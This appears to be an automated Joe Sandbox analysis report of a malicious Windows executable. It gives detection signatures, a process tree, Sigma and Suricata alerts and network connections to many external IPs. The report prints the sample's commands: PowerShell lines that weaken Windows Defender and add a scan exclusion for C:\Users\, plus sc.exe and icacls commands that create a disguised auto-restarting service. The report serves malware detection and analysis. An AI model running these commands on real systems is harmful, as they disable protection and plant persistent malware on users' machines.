Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1517355
MD5:07fc5b4f3a432b09b0d51f8b00ef05f3
SHA1:b098b5f859f45314d5edd03aad9eab420bbdec40
SHA256:d65629e6028c54eb383b310547426ed1907296a14a2e8977b9d469126de1f8a9
Tags:exeuser-Bitsight
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Changes security center settings (notifications, updates, antivirus, firewall)
Connects to many ports of the same IP (likely port scanning)
Contains functionality to hide user accounts
Found Tor onion address
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
NDIS Filter Driver detected (likely used to intercept and sniff network traffic)
Query firmware table information (likely to detect VMs)
Sigma detected: Execution from Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious New Service Creation
Sigma detected: Suspicious Program Location with Network Connections
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Connects to several IPs in different countries
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to create new users
Contains functionality to dynamically determine API calls
Contains functionality to enumerate network shares
Contains functionality to enumerate running services
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query network adapater information
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
One or more processes crash
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Use Short Name Path in Command Line
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes

Classification

  • System is w10x64
  • svchost.exe (PID: 7136 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • SgrmBroker.exe (PID: 1108 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
  • svchost.exe (PID: 5408 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 4128 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 6764 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • MpCmdRun.exe (PID: 5488 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
      • conhost.exe (PID: 5364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 3180 cmdline: C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • file.exe (PID: 3800 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 07FC5B4F3A432B09B0D51F8B00EF05F3)
  • file.exe (PID: 6132 cmdline: C:\Users\user\Desktop\file.exe MD5: 07FC5B4F3A432B09B0D51F8B00EF05F3)
    • cmd.exe (PID: 6108 cmdline: "C:\Windows\system32\cmd.exe" /k "C:\Users\user~1\AppData\Local\Temp\sobuolvnbi3uboa4e.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1352 cmdline: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 7332 cmdline: powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 7456 cmdline: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • lr75sq5smrngkif9fpn.exe (PID: 7172 cmdline: "C:\Users\user~1\AppData\Local\Temp\lr75sq5smrngkif9fpn.exe" MD5: 319865D78CC8DF6270E27521B8182BFF)
    • yhar2he6rpt6n0h1w6rh.exe (PID: 7704 cmdline: "C:\Users\user~1\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exe" MD5: 7D1755E8E41A6C2F08D2FAEFFDF9DAD1)
      • taskkill.exe (PID: 7736 cmdline: taskkill.exe /F /FI "SERVICES eq RDP-Controller" MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • conhost.exe (PID: 7744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7792 cmdline: sc.exe stop RDP-Controller MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7848 cmdline: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7900 cmdline: sc.exe failure RDP-Controller reset= 1 actions= restart/10000 MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7944 cmdline: sc.exe start RDP-Controller MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • icacls.exe (PID: 8016 cmdline: icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18 MD5: 48C87E3B3003A2413D6399EA77707F5D)
        • conhost.exe (PID: 8024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • icacls.exe (PID: 8060 cmdline: icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\95cRhCj4pPDP.acl MD5: 48C87E3B3003A2413D6399EA77707F5D)
        • conhost.exe (PID: 8068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 3232 cmdline: C:\Windows\system32\svchost.exe -k LocalService -s W32Time MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • main.exe (PID: 7988 cmdline: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe MD5: 4E320E2F46342D6D4657D2ADBF1F22D0)
    • WerFault.exe (PID: 2056 cmdline: C:\Windows\system32\WerFault.exe -u -p 7988 -s 1128 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 7216 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 336 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 3088 cmdline: C:\Windows\system32\WerFault.exe -pss -s 440 -p 7988 -ip 7988 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 3824 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • main.exe (PID: 3260 cmdline: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe MD5: 4E320E2F46342D6D4657D2ADBF1F22D0)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, CommandLine: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, NewProcessName: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, OriginalFileName: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3088, ProcessCommandLine: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, ProcessId: 7988, ProcessName: main.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k "C:\Users\user~1\AppData\Local\Temp\sobuolvnbi3uboa4e.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6108, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", ProcessId: 1352, ProcessName: powershell.exe
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exe, ParentProcessId: 7704, ParentProcessName: yhar2he6rpt6n0h1w6rh.exe, ProcessCommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, ProcessId: 7848, ProcessName: sc.exe
Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 184.65.173.183, DestinationIsIpv6: false, DestinationPort: 11171, EventID: 3, Image: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, Initiated: true, ProcessId: 7988, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49714
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'", CommandLine: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k "C:\Users\user~1\AppData\Local\Temp\sobuolvnbi3uboa4e.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6108, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'", ProcessId: 7456, ProcessName: powershell.exe
Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Windows\system32\cmd.exe" /k "C:\Users\user~1\AppData\Local\Temp\sobuolvnbi3uboa4e.bat", CommandLine: "C:\Windows\system32\cmd.exe" /k "C:\Users\user~1\AppData\Local\Temp\sobuolvnbi3uboa4e.bat", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Desktop\file.exe, ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 6132, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /k "C:\Users\user~1\AppData\Local\Temp\sobuolvnbi3uboa4e.bat", ProcessId: 6108, ProcessName: cmd.exe
Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exe, ParentProcessId: 7704, ParentProcessName: yhar2he6rpt6n0h1w6rh.exe, ProcessCommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, ProcessId: 7848, ProcessName: sc.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k "C:\Users\user~1\AppData\Local\Temp\sobuolvnbi3uboa4e.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6108, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", ProcessId: 1352, ProcessName: powershell.exe
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, ProcessId: 7136, ProcessName: svchost.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-09-25T01:11:15.400506+020020367521A Network Trojan was detected94.156.68.1241122192.168.2.749700TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exeReversingLabs: Detection: 18%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
Source: C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exeFile created: C:\Users\user~1\AppData\Local\Temp\installer.logJump to behavior
Source: Binary string: RfxVmt.pdb source: yhar2he6rpt6n0h1w6rh.exe, 00000012.00000002.1546713788.00007FF70C31E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 0000001D.00000002.2203168945.0000027B43FE4000.00000004.00000020.00020000.00000000.sdmp, T9229YlC.29.dr, update.pkg.18.dr
Source: Binary string: RfxVmt.pdbGCTL source: yhar2he6rpt6n0h1w6rh.exe, 00000012.00000002.1546713788.00007FF70C31E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 0000001D.00000002.2203168945.0000027B43FE4000.00000004.00000020.00020000.00000000.sdmp, T9229YlC.29.dr, update.pkg.18.dr
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB22706D5F NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,29_2_00007FFB22706D5F
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB22706DA3 LocalAlloc,wcsncpy,LookupAccountNameW,GetLastError,GetLastError,LocalAlloc,LookupAccountNameW,LocalFree,GetLastError,ConvertSidToStringSidA,GetLastError,wcslen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,29_2_00007FFB22706DA3
Source: C:\Users\user\AppData\Local\Temp\lr75sq5smrngkif9fpn.exeCode function: 13_2_00007FF7E3CE3DB3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,13_2_00007FF7E3CE3DB3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FF7AABD47A3 FindNextFileA,_mbscpy,FindFirstFileA,GetLastError,GetLastError,FindClose,29_2_00007FF7AABD47A3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB2270A083 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,29_2_00007FFB2270A083
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB22731883 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,29_2_00007FFB22731883
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB22765BF3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,29_2_00007FFB22765BF3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB23AB57B3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,29_2_00007FFB23AB57B3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB23AD5203 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,29_2_00007FFB23AD5203
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB23B02FE3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,29_2_00007FFB23B02FE3

Networking

barindex
Source: Network trafficSuricata IDS: 2036752 - Severity 1 - ET MALWARE Suspected BPFDoor TCP Magic Packet (Inbound) : 94.156.68.124:1122 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 88.210.6.42 ports 25314,1,2,3,4,5
Source: global trafficTCP traffic: 141.98.234.85 ports 42069,0,2,4,6,9
Source: yhar2he6rpt6n0h1w6rh.exe, 00000012.00000002.1546713788.00007FF70C31E000.00000004.00000001.01000000.00000007.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exeString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,ht
Source: main.exe, 0000001D.00000002.2207933627.00007FFB0C164000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exe, 0000001D.00000002.2206042707.0000027B4440D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exe, 0000001D.00000002.2206042707.0000027B4440D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/o
Source: main.exe, 0000001D.00000002.2206042707.0000027B4440D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/r
Source: main.exe, 0000001D.00000002.2206042707.0000027B4440D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/c
Source: main.exe, 0000001D.00000002.2203168945.0000027B43FE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exeString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,ht
Source: main.exe, 00000029.00000002.2528754555.000001FE46EDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exe, 00000029.00000002.2528754555.000001FE46EDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/W
Source: main.exe, 00000029.00000002.2528754555.000001FE46EDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/J
Source: main.exe, 00000029.00000002.2528754555.000001FE46EDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/[
Source: main.exe, 00000029.00000002.2530936773.00007FFB0C164000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: update.pkg.18.drString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: lr75sq5smrngkif9fpn.exe.8.drStatic PE information: Found NDIS imports: FwpmEngineClose0, FwpmEngineOpen0, FwpmFilterAdd0, FwpmFilterDeleteByKey0, FwpmFreeMemory0, FwpmProviderAdd0, FwpmProviderCreateEnumHandle0, FwpmProviderDestroyEnumHandle0, FwpmProviderEnum0
Source: unknownNetwork traffic detected: IP country count 18
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 94.156.68.124:1122
Source: global trafficTCP traffic: 192.168.2.7:49714 -> 184.65.173.183:11171
Source: global trafficTCP traffic: 192.168.2.7:49715 -> 194.207.132.221:17106
Source: global trafficTCP traffic: 192.168.2.7:49716 -> 85.230.189.73:29072
Source: global trafficTCP traffic: 192.168.2.7:49717 -> 141.98.234.85:42069
Source: global trafficTCP traffic: 192.168.2.7:49718 -> 88.210.6.42:25314
Source: global trafficTCP traffic: 192.168.2.7:49719 -> 101.191.73.121:18088
Source: global trafficTCP traffic: 192.168.2.7:49720 -> 207.178.119.175:29260
Source: global trafficTCP traffic: 192.168.2.7:49725 -> 188.174.130.9:11724
Source: global trafficTCP traffic: 192.168.2.7:49726 -> 188.187.151.89:26647
Source: global trafficTCP traffic: 192.168.2.7:49730 -> 24.70.217.209:15318
Source: global trafficTCP traffic: 192.168.2.7:49741 -> 89.89.209.95:62129
Source: global trafficUDP traffic: 192.168.2.7:21264 -> 46.51.90.183:12340
